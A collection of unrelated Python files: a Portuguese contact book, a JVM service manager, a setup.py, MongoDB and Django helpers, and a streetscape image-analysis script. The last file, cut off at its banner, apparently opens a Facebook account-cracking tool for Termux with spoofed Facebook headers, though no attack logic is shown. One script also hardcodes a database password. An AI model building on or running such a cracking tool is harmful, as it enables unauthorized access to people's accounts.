else:
print("Não há registros. Ainda.")
time.sleep(1)
break
self.start_agenda()
self.start_agenda()
#METODO EXCLUIR ONDE RETORNA 2 CAMINHOS: EXCLUIR UM OU EXCLUIR TODOS.
def metodo_excluir(self):
print("*" * 30 + " Excluir " + "*" * 30)
print("#" * 60)
print("DISPONIVEIS PARA EXCLUSÃO: {} CONTATOS.".format(self.ID))
print('1 - Excluir um contato')
print('2 - Excluir todos')
print('Qualquer numero - Retornar menu')
option = int(raw_input('Escolha: '))
if option == 1:
self.excluir_dado()
elif option == 2:
self.excluir_dados()
else:
print("Retornando ao menu.")
self.start_agenda()
#ISTANCIA DE CRIAÇÃO DE CONTATO.
#ESTRUTURA QUE SE CONECTA COM DIVERSOS METODOS E RETORNOS DE DADOS
def criar_contato(self):
print("-_" * 10 + " Criar Contato " + "-_" * 10)
while True:
while True:
try:
option2 = int(raw_input("Gostaria de adicionar quantos?"))
break
except ValueError:
print("Válido somente numeros!")
while option2 >= 1:
self.DADOS_INPUT
option2 = option2 - 1
self.ID = self.ID + 1
self.manipular_dados
self.salvar_contatos()
self.mostrar_lista()
option = str(raw_input("Gostaria de adicionar mais? S ou N"))
if option == 'N':
break
print("Para ver menu novamente, APERTE 6!")
self.start_agenda()
else:
print("OK!")
#MENU ESTÁTICO
@staticmethod
def menu():
print("=" * 30)
print("=" * 30)
print('''
1 - Criar Contato
2 - Excluir Contato
3 - Listar Contatos
4 - Buscar Contato e/ou modifica-lo
5 - Sair
6 - [BÔNUS] Criar Arquivo
''')
print("=" * 30)
#A FUNÇÃO DE DIRECIONAMENTO DO USUÁRIO. UMA DOS PRINCIPAIS MÉTODOS DA CLASSE.
#ONDE HÁ A INTEGRAÇÃO PRINCIPAL DAS INSTÂNCIAS.
def start_agenda(self):
print("*" * 30 + " COMEÇO DA AGENDA. SEJA BEM VINDO! " + "*" * 30)
print("*" * 95)
while True:
self.menu()
while True:
try:
option = int(input("O que você gostaria de fazer? \n"))
break
except NameError:
print("\nAceito apenas números!\n")
if option == 1:
self.criar_contato()
elif option == 2:
self.metodo_excluir()
elif option == 3:
self.mostrar_lista()
time.sleep(3)
elif option == 4:
self.buscar_contato()
elif option == 5:
self.fim()
break
elif option == 6:
self.criar_arquivo()
else:
print("Dado incorreto!")
print("Digite o 6 para ver o menu novamente.")
#APRESENTAÇÃO INICIAL DA AGENDA.
@staticmethod
def apresentacao():
print("apresentacao!")
print("#" * 30)
print("SEJA BEM VINDO À AGENDA!")
print("#" * 30)
time.sleep(1)
i = 14
i2 = 30
while i >= 0:
print("#" * i2)
i2 = i2 - 2
time.sleep(0.1)
i = i - 1
#DESPEDIDA/EXIT
@staticmethod
def fim():
print("Espero que a agenda tenha sido útil.")
print("Até a próxima.")
#CREDITOS DO NIVS
@staticmethod
def creditos():
print("iniciou!")
time.sleep(1)
print("Feito por Nivs.")
time.sleep(1)
print("Não passei a semana toda estudando orientação em objetos em Python pra você me plagiar de graça.")
time.sleep(1)
print("Sai daqui.")
time.sleep(4)
#PRIMEIRA CAMADA INICIAL
#ORGANIZAÇÃO DE CRÉDITOS, APRESENTAÇÃO INICIAL, E INICIO DO ALGORITMO
def inicio(self):
#self.creditos()
#self.apresentacao()
self.start_agenda()
agenda = Agenda()
|
#!/usr/bin/env python
import json
import time
import re
from abc import abstractmethod
import requests
from servicemanager.smprocess import SmProcess, kill_pid
from servicemanager.service.smservice import (
SmService,
SmMicroServiceStarter,
SmServiceStatus,
)
from servicemanager.smrepo import clone_repo_if_requred
class SmJvmServiceStarter(SmMicroServiceStarter):
test_id_param = "service.manager.testId"
def __init__(
self,
context,
service_name,
expected_service_type,
run_from,
port,
classifier,
service_mapping_ports,
version,
proxy,
append_args,
):
SmMicroServiceStarter.__init__(
self,
context,
service_name,
expected_service_type,
run_from,
port,
classifier,
service_mapping_ports,
version,
proxy,
append_args,
)
def start(self, appendArgs=None):
if self.run_from == "SOURCE":
if not clone_repo_if_requred(self):
# TODO - should this just return None? or throw an exception? Should clone_repo_if_required throw an exception?
return None
return self.start_from_sources()
else:
return self.start_from_binary()
def process_arguments(self):
run_from = self.run_from
if self.run_from == "RELEASE":
run_from = (self.version or "UNKNOWN") + "-" + run_from
jvm_args = ["-Dservice.manager.serviceName=%s" % self.service_name]
jvm_args += ["-Dservice.manager.runFrom=%s" % run_from]
if self.context.is_test:
jvm_args += ["-Dservice.manager.testId=%s" % self.context.test_id]
jvm_args += ["-Dservice.manager.startTime=%s" % time.time()]
return jvm_args
@abstractmethod
def start_from_sources(self):
pass
@abstractmethod
def start_from_binary(self):
pass
class SmJvmService(SmService):
def __init__(self, context, service_name, expected_service_type):
SmService.__init__(self, context, service_name, expected_service_type)
self.pattern = "service.manager.serviceName=%s$" % self.service_name
self.default_port = self.required_data("defaultPort")
self.healthcheck = self.required_data("healthcheck")
@abstractmethod
def post_stop(self):
pass
@abstractmethod
def get_port_argument(self):
pass
@abstractmethod
def get_running_healthcheck_port(self, process):
pass
@abstractmethod
def get_details_url(self):
pass
def get_pattern(self):
return self.pattern
def status(self, all_processes=None):
processes = SmProcess.processes_matching(self.pattern, all_processes)
def _status_for_process(process):
port = process.extract_integer_argument("-D%s=(\d*)" % self.get_port_argument(), self.default_port)
test_id = process.extract_argument("-Dservice.manager.testId=([^ ]+)", "")
run_from = process.extract_argument("-Dservice.manager.runFrom=([^ ]+)", "")
features = process.extract_arguments("-Dfeature.([^ =]+)=true", "")
healthcheck = (
SmServiceStatus.HEALTHCHECK_PASS if self.run_healthcheck(process) else SmServiceStatus.HEALTHCHECK_BOOT
)
return SmServiceStatus.for_process(
self.service_name, process, port, test_id, run_from, features, healthcheck,
)
return list(map(_status_for_process, processes))
def request_running_service_details_on_default_port(self):
url = self.get_details_url().replace("${port}", str(self.default_port))
try:
response = requests.get(url)
return json.loads(response.text)
except requests.RequestException:
return None
def is_started_on_default_port(self):
processes = SmProcess.processes_matching(self.pattern)
default_port_argument = "-D%s=%d" % (self.get_port_argument, self.default_port)
for process in processes:
if process.has_argument(default_port_argument):
return True
return False
def get_default_healthcheck_port(self):
return self.default_port
def stop(self, wait=False):
for process in SmProcess.processes_matching(self.pattern):
kill_pid(self.context, process.ppid, wait=wait)
kill_pid(self.context, process.pid, wait=wait)
self.context.log(
"name: %s\tppid: %s\tpid: %s\tuptime: %s"
% (self.service_name, process.ppid, process.pid, process.uptime),
True,
)
self.post_stop()
def run_healthcheck(self, process):
port = self.get_running_healthcheck_port(process)
if not port:
port = self.get_default_healthcheck_port()
healthcheck_url = self.service_data["healthcheck"]["url"].replace("${port}", str(port))
healthcheck_response_regex = self.service_data["healthcheck"]["response"] or ""
try:
ping_response = requests.get(healthcheck_url)
response_text = ping_response.text
return re.search(healthcheck_response_regex, response_text) and ping_response.status_code == 200
except requests.RequestException:
return False
|
from distutils.core import setup
setup(
name = 'guts',
version = '0.2',
description = 'Lightweight declarative YAML and XML data binding for Python.',
package_dir = { '': 'src' },
py_modules = ['guts', 'guts_array'],
scripts = [ 'scripts/xmlschema-to-guts' ],
author = 'Sebastian Heimann',
author_email = 'sebastian.heimann@gfz-potsdam.de',
url = 'https://github.com/emolch/guts/',
keywords = [ 'data-binding', 'xml', 'yaml' ],
classifiers = [
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Topic :: Software Development :: Libraries :: Python Modules',
]
)
|
import pymongo
from pymongo import MongoClient
from pymongo.errors import ConnectionFailure
import urllib.parse
from dotenv import load_dotenv
import os
load_dotenv(".env")
class Config():
def __init__(self):
self.cluster = pymongo.MongoClient(os.getenv("MONGO_URI"))
try:
print("connecting to mongo")
except ConnectionFailure:
print("Server not available")
else:
print("connected to mongo")
self.database = self.cluster["Twitter"]
def create_author_thread_db(self, author, threads):
collection = self.cluster["threads"][author]
collection.drop()
collection.insert_many(threads)
def create_author_data_db(self, author, data):
collection = self.cluster["authors"]["info"]
collection.insert(data)
def insert_threads(self, author, data):
collection = self.cluster["Twitter"]["threads"]
ids = [doc["_id"] for doc in data]
collection.delete_many({"_id": {"$in": ids}})
collection.insert_many(data)
def delete_threads(self, author):
collection = self.cluster["Twitter"]["threads"]
collection.delete_many({"author": author})
# return deleted_count.deleted_count
def list_authors(self):
collection = self.cluster["Twitter"]["threads"]
distinct = collection.distinct("author")
return distinct
def create_index(self):
collection = self.cluster["Twitter"]["threads"]
collection.drop_indexes()
collection.create_index([("keywords", "text"),
("thread_texts", "text")],
name="thread_text_index")
# for d in collection.find({"$text": {"$search": "people"}}).limit(1):
# print(d)
|
# -*- coding: utf-8 -*-
"""
Created on Wed May 5 18:27:47 2021
@author: richie bao -Spatial structure index value distribution of urban streetscape
"""
import pickle
from database import postSQL2gpd,gpd2postSQL
from segs_object_analysis import seg_equirectangular_idxs
import glob,os
import numpy as np
import pandas as pd
from pathlib import Path
xian_epsg=32649 #Xi'an WGS84 / UTM zone 49N
wgs84_epsg=4326
class dynamicStreetView_visualPerception:
'''
class - 应用Star提取图像关键点,结合SIFT获得描述子,根据特征匹配分析特征变化(视觉感知变化),即动态街景视觉感知
Paras:
imgs_fp - 图像路径列表
knnMatch_ratio - 图像匹配比例,默认为0.75
'''
def __init__(self,imgs_fp,knnMatch_ratio=0.75):
self.knnMatch_ratio=knnMatch_ratio
self.imgs_fp=imgs_fp
def kp_descriptor(self,img_fp):
import cv2 as cv
'''
function - 提取关键点和获取描述子
'''
img=cv.imread(img_fp)
star_detector=cv.xfeatures2d.StarDetector_create()
key_points=star_detector.detect(img) #应用处理Star特征检测相关函数,返回检测出的特征关键点
img_gray=cv.cvtColor(img,cv.COLOR_BGR2GRAY) #将图像转为灰度
kp,des=cv.xfeatures2d.SIFT_create().compute(img_gray, key_points) #SIFT特征提取器提取特征
return kp,des
def feature_matching(self,des_1,des_2,kp_1=None,kp_2=None):
import cv2 as cv
'''
function - 图像匹配
'''
bf=cv.BFMatcher()
matches=bf.knnMatch(des_1,des_2,k=2)
'''
可以由匹配matches返回关键点(train,query)的位置索引,train图像的索引,及描述子之间的距离
DMatch.distance - Distance between descriptors. The lower, the better it is.
DMatch.trainIdx - Index of the descriptor in train descriptors
DMatch.queryIdx - Index of the descriptor in query descriptors
DMatch.imgIdx - Index of the train image.
'''
'''
if kp_1 !=None and kp_2 != None:
kp1_list=[kp_1[mat[0].queryIdx].pt for mat in matches]
kp2_list=[kp_2[mat[0].trainIdx].pt for mat in matches]
des_distance=[(mat[0].distance,mat[1].distance) for mat in matches]
print(des_distance[:5])
'''
good=[]
for m,n in matches:
if m.distance < self.knnMatch_ratio*n.distance:
good.append(m)
#good_num=len(good)
return good #,good_num
def sequence_statistics(self):
from tqdm import tqdm
'''
function - 序列图像匹配计算,每一位置图像与后续所有位置匹配分析
'''
des_list=[]
print("计算关键点和描述子...")
for f in tqdm(self.imgs_fp):
_,des=self.kp_descriptor(f)
des_list.append(des)
matches_sequence={}
print("计算序列图像匹配数...")
for i in tqdm(range(len(des_list)-1)):
matches_temp=[]
for j_des in des_list[i:]:
matches_temp.append(self.feature_matching(des_list[i],j_des))
matches_sequence[i]=matches_temp
matches_num={k:[len(v) for v in val] for k,val in matches_sequence.items()}
return matches_num
class movingAverage_inflection:
import pandas as pd
'''
class - 曲线(数据)平滑,与寻找曲线水平和纵向的斜率变化点
Paras:
series - pandas 的Series格式数据
window - 滑动窗口大小,值越大,平滑程度越大
plot_intervals - 是否打印置信区间,某人为False
scale - 偏差比例,默认为1.96,
plot_anomalies - 是否打印异常值,默认为False,
figsize - 打印窗口大小,默认为(15,5),
threshold - 拐点阈值,默认为0
'''
def __init__(self,series, window, plot_intervals=False, scale=1.96, plot_anomalies=False,figsize=(15,5),threshold=0):
self.series=series
self.window=window
self.plot_intervals=plot_intervals
self.scale=scale
self.plot_anomalies=plot_anomalies
self.figsize=figsize
self.threshold=threshold
self.rolling_mean=self.movingAverage()
def masks(self,vec):
'''
function - 寻找曲线水平和纵向的斜率变化,参考 https://stackoverflow.com/questions/47342447/find-locations-on-a-curve-where-the-slope-changes
'''
d=np.diff(vec)
dd=np.diff(d)
# Mask of locations where graph goes to vertical or horizontal, depending on vec
to_mask=((d[:-1] != self.threshold) & (d[:-1] == -dd-self.threshold))
# Mask of locations where graph comes from vertical or horizontal, depending on vec
from_mask=((d[1:] != self.threshold) & (d[1:] == dd-self.threshold))
return to_mask, from_mask
def apply_mask(self,mask, x, y):
return x[1:-1][mask], y[1:-1][mask]
def knee_elbow(self):
'''
function - 返回拐点的起末位置
'''
x_r=np.array(self.rolling_mean.index)
y_r=np.array(self.rolling_mean)
to_vert_mask, from_vert_mask=self.masks(x_r)
to_horiz_mask, from_horiz_mask=self.masks(y_r)
to_vert_t, to_vert_v=self.apply_mask(to_vert_mask, x_r, y_r)
from_vert_t, from_vert_v=self.apply_mask(from_vert_mask, x_r, y_r)
to_horiz_t, to_horiz_v=self.apply_mask(to_horiz_mask, x_r, y_r)
from_horiz_t, from_horiz_v=self.apply_mask(from_horiz_mask, x_r, y_r)
return x_r,y_r,to_vert_t, to_vert_v,from_vert_t, from_vert_v,to_horiz_t, to_horiz_v,from_horiz_t, from_horiz_v
def movingAverage(self):
rolling_mean=self.series.rolling(window=self.window).mean()
return rolling_mean
def plot_movingAverage(self,inflection=False):
import numpy as np
from sklearn.metrics import median_absolute_error, mean_absolute_error
import matplotlib.pyplot as plt
"""
function - 打印移动平衡/滑动窗口,及拐点
"""
plt.figure(figsize=self.figsize)
plt.title("Moving average\n window size = {}".format(self.window))
plt.plot(self.rolling_mean, "g", label="Rolling mean trend")
#打印置信区间,Plot confidence intervals for smoothed values
if self.plot_intervals:
mae=mean_absolute_error(self.series[self.window:], self.rolling_mean[self.window:])
deviation=np.std(self.series[self.window:] - self.rolling_mean[self.window:])
lower_bond=self.rolling_mean - (mae + self.scale * deviation)
upper_bond=self.rolling_mean + (mae + self.scale * deviation)
plt.plot(upper_bond, "r--", label="Upper Bond / Lower Bond")
plt.plot(lower_bond, "r--")
# 显示异常值,Having the intervals, find abnormal values
if self.plot_anomalies:
anomalies=pd.DataFrame(index=self.series.index, columns=self.series.to_frame().columns)
anomalies[self.series<lower_bond]=self.series[self.series<lower_bond].to_frame()
anomalies[self.series>upper_bond]=self.series[self.series>upper_bond].to_frame()
plt.plot(anomalies, "ro", markersize=10)
if inflection:
x_r,y_r,to_vert_t, to_vert_v,from_vert_t, from_vert_v,to_horiz_t, to_horiz_v,from_horiz_t, from_horiz_v=self.knee_elbow()
plt.plot(x_r, y_r, 'b-')
plt.plot(to_vert_t, to_vert_v, 'r^', label='Plot goes vertical')
plt.plot(from_vert_t, from_vert_v, 'kv', label='Plot stops being vertical')
plt.plot(to_horiz_t, to_horiz_v, 'r>', label='Plot goes horizontal')
plt.plot(from_horiz_t, from_horiz_v, 'k<', label='Plot stops being horizontal')
plt.plot(self.series[self.window:], label="Actual values")
plt.legend(loc="upper right")
plt.grid(True)
plt.xticks(rotation='vertical')
plt.show()
def vanishing_position_length(matches_num,coordi_df,epsg,**kwargs):
from shapely.geometry import Point, LineString, shape
import geopandas as gpd
import pyproj
'''
function - 计算图像匹配特征点几乎无关联的距离,即对特定位置视觉随距离远去而感知消失的距离
Paras:
matches_num - 由类dynamicStreetView_visualPerception计算的特征关键点匹配数量
coordi_df - 包含经纬度的DataFrame,其列名为:lon,lat
**kwargs - 同类movingAverage_inflection配置参数
'''
MAI_paras={'window':15,'plot_intervals':True,'scale':1.96, 'plot_anomalies':True,'figsize':(15*2,5*2),'threshold':0}
MAI_paras.update(kwargs)
#print( MAI_paras)
vanishing_position={}
for idx in range(len(matches_num)):
x=np.array(range(idx,idx+len(matches_num[idx])))
y=np.array(matches_num[idx])
y_=pd.Series(y,index=x)
MAI=movingAverage_inflection(y_, window=MAI_paras['window'],plot_intervals=MAI_paras['plot_intervals'],scale=MAI_paras['scale'], plot_anomalies=MAI_paras['plot_anomalies'],figsize=MAI_paras['figsize'],threshold=MAI_paras['threshold'])
_,_,_,_,from_vert_t, _,_, _,from_horiz_t,_=MAI.knee_elbow()
if np.any(from_horiz_t!= None) :
vanishing_position[idx]=(idx,from_horiz_t[0])
else:
vanishing_position[idx]=(idx,idx)
vanishing_position_df=pd.DataFrame.from_dict(vanishing_position,orient='index',columns=['start_idx','end_idx'])
vanishing_position_df['geometry']=vanishing_position_df.apply(lambda idx:LineString(coordi_df[idx.start_idx:idx.end_idx]['geometry'].tolist()), axis=1)
crs_4326={'init': 'epsg:4326'}
vanishing_position_gdf=gpd.GeoDataFrame(vanishing_position_df,geometry='geometry',crs=crs_4326)
crs_=pyproj.CRS(epsg)
vanishing_position_gdf_reproj=vanishing_position_gdf.to_crs(crs_)
vanishing_position_gdf_reproj['length']=vanishing_position_gdf_reproj.geometry.length
return vanishing_position_gdf_reproj
def movingAverage(series,window):
rolling_mean=series.rolling(window=window).mean()
return rolling_mean
def tourLine_segs_vanishing_position_length(tourLine_segment,img_fp_list_sorted,coordi_df,xian_epsg):
from tqdm import tqdm
vanishing_dict={}
for k,v in tqdm(tourLine_segment.items()):
img_fp_seg_list=img_fp_list_sorted[v[0]:v[1]]
dsv_vp=dynamicStreetView_visualPerception(img_fp_seg_list) #[:200]
matches_num=dsv_vp.sequence_statistics()
coordi_seg_df=coordi_df[v[0]:v[1]]
vanishing_gpd=vanishing_position_length(matches_num,coordi_seg_df,epsg="EPSG:{}".format(xian_epsg),threshold=0)
vanishing_dict[k]=vanishing_gpd
with open('./processed data/tourLine_vanishing.pkl','wb') as f:
pickle.dump(vanishing_dict,f)
return vanishing_dict
def segs_vanishing_statistics(vanishing_dict):
segs_Vanishing_stat={}
for k,vanishing_gpd in vanishing_dict.items():
vanishing_length_desc=vanishing_gpd.length.describe()
vanishing_fre=vanishing_gpd.length.value_counts(bins=5)
segs_Vanishing_stat[k]={'vanishing_length_desc':vanishing_length_desc,'vanishing_fre':vanishing_fre}
return segs_Vanishing_stat
def vanishing_segment_mark(vanishing_length,length_moving_reverse,tourLine_segment,segment_name):
import matplotlib.pyplot as plt
import matplotlib
font = {
# 'family' : 'normal',
# 'weight' : 'bold',
'size' : 28}
matplotlib.rc('font', **font)
fig, ax=plt.subplots(figsize=(30,10))
ax.plot(vanishing_length,label='vanishing distance_north')
length_moving_reverse_list=length_moving_reverse.to_list()
length_moving_reverse_list.reverse()
ax.plot(length_moving_reverse_list,'--',label='vanishing distance_south')
v_length=[]
for k,v in tourLine_segment.items():
# print(k,v)
# v_length_seg=vanishing_length.iloc[v[0]:v[1]].to_list()
# print(length_seg)
# print(segment_name[k])
ax.vlines(v[1],0,800,colors='r',linestyle='--',) #label=segment_name[k]
ax.text(v[1],920, segment_name[k], fontsize=22,rotation=-90, rotation_mode='anchor',va='top')
plt.legend(loc=3)
ax.spines['right'].set_visible(False)
ax.spines['top'].set_visible(False)
# plt.show()
plt.savefig('./graph/vanishing_segment_mark.png',dpi=300)
if __name__=="__main__":
# 01
# tourLine_seg_path='./processed data/tour line seg'
# tourline_label_seg_path='./processed data/tourline_label_seg'
# tourLine_img_path='./data/panoramic imgs_tour line valid'
# with open('./processed data/coords_tourLine.pkl','rb') as f:
# coords_tourLine=pickle.load(f)
# tourLine_panorama_object_percent_gdf=seg_equirectangular_idxs(tourline_label_seg_path,tourLine_seg_path,tourLine_img_path,coords_tourLine,)
# gpd2postSQL(tourLine_panorama_object_percent_gdf,table_name='tourLine_panorama_object_percent',myusername='postgres',mypassword='123456',mydatabase='streetscape_GSV')
#02
#sift and match
# img_fp_list=glob.glob(os.path.join(tourLine_img_path,'*.jpg'))
# img_fp_dict={int(Path(p).stem.split('_')[-1]):p for p in img_fp_list}
# img_fp_key=list(img_fp_dict.keys())
# img_fp_key.sort()
# img_fp_list_sorted=[img_fp_dict[k] for k in img_fp_key]
# img_fp_list_sorted.reverse()
# dsv_vp=dynamicStreetView_visualPerception(img_fp_list_sorted) #[:200]
# matches_num=dsv_vp.sequence_statistics()
#03
# idx=508
# x=np.array(range(idx,idx+len(matches_num[idx])))
# y=np.array(matches_num[idx])
# y_=pd.Series(y,index=x)
# MAI=movingAverage_inflection(y_, window=15,plot_intervals=True,scale=1.96, plot_anomalies=True,figsize=(15*2,5*2),threshold=0)
# MAI.plot_movingAverage(inflection=True)
#04
# tourLine_panorama_object_percent_gdf=postSQL2gpd(table_name='tourLine_panorama_object_percent',geom_col='geometry',myusername='postgres',mypassword='123456',mydatabase='streetscape_GSV')
# coordi_df=tourLine_panorama_object_percent_gdf.sort_values(by='fn_idx')
# vanishing_gpd=vanishing_position_length(matches_num,coordi_df,epsg="EPSG:{}".format(xian_epsg),threshold=0)
# print("感知消失距离统计:","_"*50,"\n")
# print(vanishing_gpd[vanishing_gpd["length"] >1].length.describe())
# print("频数统计:","_"*50,"\n")
# print(vanishing_gpd[vanishing_gpd["length"] >1]["length"].value_counts(bins=5))
#'tourLine_vanishing'
# gpd2postSQL(vanishing_gpd,table_name='tourLine_vanishing_reverse',myusername='postgres',mypassword='123456',mydatabase='streetscape_GSV')
#05
tourLine_vanishing_gdf=postSQL2gpd(table_name='tourLine_vanishing',geom_col='geometry',myusername='postgres',mypassword='123456',mydatabase='streetscape_GSV')
length_moving=movingAverage(tourLine_vanishing_gdf.length,window=15)
length_moving.plot(figsize=(20,10))
tourLine_vanishing_reverse_gdf=postSQL2gpd(table_name='tourLine_vanishing_reverse',geom_col='geometry',myusername='postgres',mypassword='123456',mydatabase='streetscape_GSV')
length_moving_reverse=movingAverage(tourLine_vanishing_reverse_gdf.length,window=15)
length_moving_reverse.plot(figsize=(20,10))
#06
tourLine_segment={
0:(0,39),
1:(39,101),
2:(101,191),
3:(191,290),
4:(290,367),
5:(367,437),
6:(437,462),
7:(462,488),
8:(488,565),
9:(565,603)
}
# vanishing_dict=tourLine_segs_vanishing_position_length(tourLine_segment,img_fp_list_sorted,coordi_df,xian_epsg)
# with open('./processed data/tourLine_vanishing.pkl','rb') as f:
# vanishing_dict=pickle.load(f)
# segs_Vanishing_stat=segs_vanishing_statistics(vanishing_dict)
# segs_vanishing_desc={k:segs_Vanishing_stat[k]['vanishing_length_desc'] for k in segs_Vanishing_stat.keys()}
# # pd.set_option('display.max_columns', None)
# segs_vanishing_desc_df=pd.DataFrame.from_dict(segs_vanishing_desc)
# tour_line_seg_gdf=postSQL2gpd(table_name='tour_line_seg',geom_col='geometry',myusername='postgres',mypassword='123456',mydatabase='streetscape_GSV')
tourLine_segment_name={
0:'Jianfu Temple Road',
1:'North section of Zhuque Street',
2:'Friendship Road',
3:'Changan Road',
4:'South Gate Bends',
5:'South Street',
6:'Bell Tower Loop',
7:'West Street',
8:'Hui Street',
9:'Xihuamen Street' }
vanishing_segment_mark(length_moving,length_moving_reverse,tourLine_segment,tourLine_segment_name)
|
# -*- coding: utf-8 -*-
"""
Widgets module.
This module provides the Widget class and a real-time method, used to register
a instance of Widget as real-time. The instance has to be registered at
compile time in order for Django to know the URL used to return contents.
"""
from __future__ import unicode_literals
from hashlib import sha256
from .apps import AppSettings
app_settings = AppSettings()
REALTIME_WIDGETS = []
def realtime(widget, url_name=None, url_regex=None, time_interval=None):
"""
Return a widget as real-time.
Args:
widget (Widget): the widget to register and return as real-time.
url_name (str): the URL name to call to get updated content.
url_regex (regex): the URL regex to be matched.
time_interval (int): the interval of refreshment in milliseconds.
Returns:
Widget: the "real-timed" widget.
"""
if not hasattr(widget, 'get_updated_content'):
raise AttributeError('Widget %s must implement get_updated_content '
'method.' % widget)
elif not callable(widget.get_updated_content):
raise ValueError('get_updated_content in widget %s is not callable'
% widget)
if url_name is None:
if getattr(widget, 'url_name', None) is not None:
url_name = widget.url_name
else:
url_name = widget.__class__.__name__
if url_name in [w.url_name for w in REALTIME_WIDGETS]:
raise ValueError('URL name %s is already used by another '
'real time widget.' % url_name)
if url_regex is None:
if getattr(widget, 'url_regex', None) is not None:
url_regex = widget.url_regex
else:
url_regex = sha256(url_name.encode('utf-8'))
url_regex = url_regex.hexdigest()[:32]
url_regex = 'realtime/' + url_regex
if url_regex in [w.url_regex for w in REALTIME_WIDGETS]:
raise ValueError('URL regex %s is already used by another '
'real time widget.' % url_regex)
if time_interval is None:
if getattr(widget, 'time_interval', None) is not None:
time_interval = widget.time_interval
else:
time_interval = app_settings.default_time_interval
from django.views.generic import View
from braces.views import AjaxResponseMixin, JSONResponseMixin
# pylama:ignore=C0111,R0201
class PartialResponse(JSONResponseMixin, AjaxResponseMixin, View):
def get_data(self):
return widget.get_updated_content()
def get(self, request, *args, **kwargs):
return self.get_ajax(request, *args, **kwargs)
def get_ajax(self, request, *args, **kwargs):
return self.render_json_response(self.get_data())
PartialResponse.url_name = url_name
PartialResponse.url_regex = url_regex
PartialResponse.time_interval = time_interval
REALTIME_WIDGETS.append(PartialResponse)
if not hasattr(widget, 'url_name'):
widget.url_name = url_name
if not hasattr(widget, 'url_regex'):
widget.url_regex = url_regex
if not hasattr(widget, 'time_interval'):
widget.time_interval = time_interval
return widget
class Widget(object):
"""Widget class."""
def __init__(self,
html_id=None,
name=None,
content=None,
template=None,
classes=None,
**kwargs):
"""
Init method.
Args:
html_id (str): an ID to set on the HTML item.
name (str): the name of the item, displayed in HTML.
content (): suitable content according to chosen display.
template (str): the template responsible for display.
classes (str): additional classes to pass to the HTML item.
"""
if html_id is not None:
try:
self.html_id = html_id
except AttributeError:
self._html_id = html_id
if name is not None:
try:
self.name = name
except AttributeError:
self._name = name
if content is not None:
try:
self.content = content
except AttributeError:
self._content = content
if template is not None:
try:
self.template = template
except AttributeError:
self._template = template
if classes is not None:
try:
self.classes = classes
except AttributeError:
self._classes = classes
if not hasattr(self, 'template'):
raise AttributeError('template is a required widget attribute')
for kw, arg in kwargs.items():
setattr(self, kw, arg)
def get_updated_content(self):
"""Return updated content (for real-time widgets)."""
return self.content
|
from collections import namedtuple, OrderedDict
from itertools import starmap
import threading
import inspect
# Stolen from StackOverflow:
# http://stackoverflow.com/questions/323972/is-there-any-way-to-kill-a-thread-in-python
class StoppableThread(threading.Thread):
"""Thread class with a stop() method. The thread itself has to check
regularly for the stopped() condition."""
def __init__(self):
super(StoppableThread, self).__init__()
self._stop = threading.Event()
def stop(self):
self._stop.set()
def stopped(self):
return self._stop.isSet()
def identity(x):
return x
def wrap_transform(fn):
"""
This function returns a new function that accepts
an arbitrary number of arguments
and calls the wrapped function with the number of arguments that it supports. For
example:
def f(a, b):
...
g = wrap_transform(f)
assert g(a, b, c, d) == f(a, b)
"""
assert callable(fn)
try:
info = inspect.getargspec(fn)
nargs = len(info.args)
except TypeError:
# fallback to pipeline mode
nargs = 1
def wrapped(*args, **kwargs):
# print("called with {}".format(str(args)))
return fn(*args[:nargs])
return wrapped
def json_serializable_exception(e, **kwargs):
emsg = {"_exception": {}}
exc = {"exc_value": e.__repr__()}
try:
exc["exc_class"] = str(e.__class__)
exc["exc_type"] = str(e.exception.__class__)
exc["exc_tb"] = e.traceback
except AttributeError, ae:
pass
emsg["_exception"].update(exc)
emsg["_exception"].update(kwargs)
return emsg
import os, errno
def mkdir_p(path):
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else: raise
class OrderedDefaultDict(OrderedDict):
def __init__(self, default_factory, *args, **kwargs):
super(OrderedDefaultDict, self).__init__(*args, **kwargs)
assert callable(default_factory)
self.default_factory = default_factory
def __getitem__(self, key):
try:
return super(OrderedDefaultDict, self).__getitem__(key)
except KeyError:
return self.__missing__(key)
def __missing__(self, key):
if self.default_factory is None:
raise KeyError(key)
self[key] = value = self.default_factory()
return value
|
#/usr/bin/python2
#writen/coded/by/harry
try:
import os,sys,time,datetime,re,random,hashlib,threading,json,getpass,urllib,cookielib,requests
from multiprocessing.pool import ThreadPool
except ImportError:
os.system("pip2 install requests")
os.system("python2 harry.py")
os.system("clear")
if not os.path.isfile("/data/data/com.termux/files/usr/bin/node"):
os.system("apt update && apt install nodejs -y")
from requests.exceptions import ConnectionError
os.system("git pull")
if not os.path.isfile("/data/data/com.termux/files/home/Crack-world/...../node_modules/bytes/index.js"):
os.system("fuser -k 5000/tcp &")
os.system("cd ..... && pip install progress")
os.system("cd ..... && npm install")
os.system("cd ..... && node index.js &")
os.system("clear")
time.sleep(10)
elif os.path.isfile("/data/data/com.termux/files/home/Crack-world/...../node_modules/bytes/index.js"):
os.system("fuser -k 5000/tcp &")
os.system("#")
os.system("cd ..... && node index.js &")
os.system("clear")
bd=random.randint(2e7, 3e7)
sim=random.randint(2e4, 4e4)
header={'x-fb-connection-bandwidth': repr(bd),'x-fb-sim-hni': repr(sim),'x-fb-net-hni': repr(sim),'x-fb-connection-quality': 'EXCELLENT','x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA','user-agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Kiwi Chrome/68.0.3438.0 Safari/537.36','content-type': 'application/x-www-form-urlencoded','x-fb-http-engine': 'Liger'}
reload(sys)
sys.setdefaultencoding("utf-8")
c = "\033[1;92m"
c2 = "\033[0;97m"
c3 = "\033[1;91m"
#Dev/fiaz/khan
logo = """
\033[1;97md8b db d888888b .d8b. d88888D d888888b
\033[1;97m888o 88 `88' d8' `8b YP d8' `88'
\033[1;97m88V8o 88 88 88ooo88 d8' 88
\033[1;97m88 V8o88 88 88~~~88 d8' 88
\033[1;97m88 V888 .88. 88 88 d8' db .88.
\033[1;97mVP V8P Y888888P YP YP d88888P Y888888P
\033[1;97m------------------------------------------------
\033[1;97mOwner : FIAZ KHAN NIAZI
\033[1;97mFacebook : Muhammad Fiaz Khan
